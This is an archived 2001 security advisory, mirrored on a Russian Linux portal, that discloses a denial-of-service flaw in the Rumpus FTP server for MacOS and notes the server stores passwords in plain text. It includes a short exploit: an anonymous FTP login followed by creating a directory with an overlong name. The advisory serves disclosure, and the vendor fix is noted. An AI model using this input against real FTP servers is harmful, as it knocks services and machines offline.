The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Rumpus FTP DoS


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 15 May 2001 19:22:38 +0200 (EET)
From: Jass Seljamaa <[email protected]>
To: [email protected]
Subject: Rumpus FTP DoS

Maxum(maxum.com) Rumpus FTP server DoS vulnerability

Versions Affected: tested on v1.3.3, 2.0 dev 3(MacOS 8.6, 9.1), probably 
earlier, 
Not affected: v1.3.4

Description:
If you try to make a directory which name is 65 characters long, the 
Rumpus FTP service and the computer freezes. You can try to force 
Rumpus to quit, but it never worked for me(always crashed when I 
pressed the \'Force quit\' button). Also, the passwords are stored in plain 
text(in prefs folder, a file called \'Rumpus User Database\'), as in most 
macintosh programs, Maxum Support said to think about encrypting 
passwords in newer versions. 

Exploit:

ftp 192.168.0.1

user anonymous
pass [email protected]

mkdir 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa

Solution:
Vendor contacted, fixed in version 1.3.4.


Jass Seljamaa,
[email protected]
05212242  


-------------------------------------------------
This mail sent through IMP: email.isp.ee

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру